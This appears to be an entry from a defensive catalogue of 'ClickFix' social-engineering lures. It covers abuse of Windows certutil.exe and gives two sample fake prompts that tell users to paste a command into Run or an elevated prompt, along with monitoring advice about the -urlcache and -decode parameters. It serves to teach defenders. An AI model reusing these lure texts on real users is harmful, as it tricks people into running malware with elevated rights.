⚠️ Security Warning

ClickFix lures can lead to malware and computer viruses. If you see text like this online, it's likely a scam.

Back to Techniques

certutil.exe

certutil.exe is a Windows command-line program that is installed as part of Certificate Services. It's used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates. Attackers commonly abuse certutil.exe to download malicious files, decode base64-encoded payloads, and bypass application whitelisting.

windows cli MOTW UAC

Update SSL Certificate

Try Example
MOTW

Your SSL certificates need to be updated for secure browsing. Follow these steps to update your certificates:

  1. Press Win-R on your keyboard

  2. Type certutil and press Enter

  3. Press Ctrl-V to paste the certificate update command

  4. Press Enter to execute

References:

Mitigations:

  • Monitor for suspicious certutil.exe command lines, especially with -urlcache or -decode parameters

  • Implement application control to restrict certutil.exe execution patterns

  • Never run commands from untrusted sources

  • Be suspicious of requests to update certificates via command line

Contributor: Michael Haag (2025-09-09)

Fix Secure Connection Issues

Try Example
UAC

Your secure connection settings need to be repaired. Follow these steps to fix HTTPS connections:

  1. Press Win on your keyboard

  2. Type certutil and press Ctrl+Shift+Enter

  3. Click Yes when prompted

  4. Press Ctrl-V to paste the security configuration

  5. Press Enter to execute

References:

Mitigations:

  • Monitor for suspicious certutil.exe command lines, especially with -urlcache or -decode parameters

  • Implement application control to restrict certutil.exe execution patterns

  • Never run commands from untrusted sources

  • Use browser settings or Windows Internet Options to manage certificates

Contributor: Michael Haag (2025-09-09)